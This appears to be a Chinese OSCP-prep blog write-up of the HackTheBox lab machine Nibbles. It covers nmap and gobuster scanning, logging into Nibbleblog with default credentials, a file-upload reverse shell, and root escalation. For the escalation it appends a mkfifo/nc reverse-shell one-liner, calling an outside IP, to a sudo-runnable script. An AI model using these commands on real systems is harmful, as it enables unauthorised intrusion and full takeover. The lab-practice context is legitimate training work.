OSCP备考_0x03_HackThBox靶机_Linux_nibbles

Ethan医生6个月前靶场192

信息收集

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.193.19 (扫描UDP)



http://10.129.193.19/,F12发现

image.png

image.png

应该有入口点


image.png



爆破路径看看有没有啥


gobuster dir -u http://10.129.193.19/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50

gobuster dir -u http://10.129.193.19/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50

image.png

上面信息可以查看到版本

image.png

有上传文件漏洞,查看怎样利用反弹SHELL

admin/nibbles 登入账号密吗,由于原本爆破导致机器禁止访问

image.png

找到My image进行上传文件

image.png

然后监听nc -lvnp 3333


image.png

开始提权

sudo -l发现

image.png

然后开始创建monitor.sh

poc:echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.31 3334 >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh

image.png

标签: OSCP

相关文章

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

OSCP备考_0x47_HackThBox靶机_Windows_conceal

OSCP备考_0x47_HackThBox靶机_Windows_conceal

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.122 (扫描TCP)我们普通的tcp啥都没有,所以考虑udp扫描当然也有可能是...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)发现是tomcat直接测试看看能不能爆破登入,上传war包&n...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。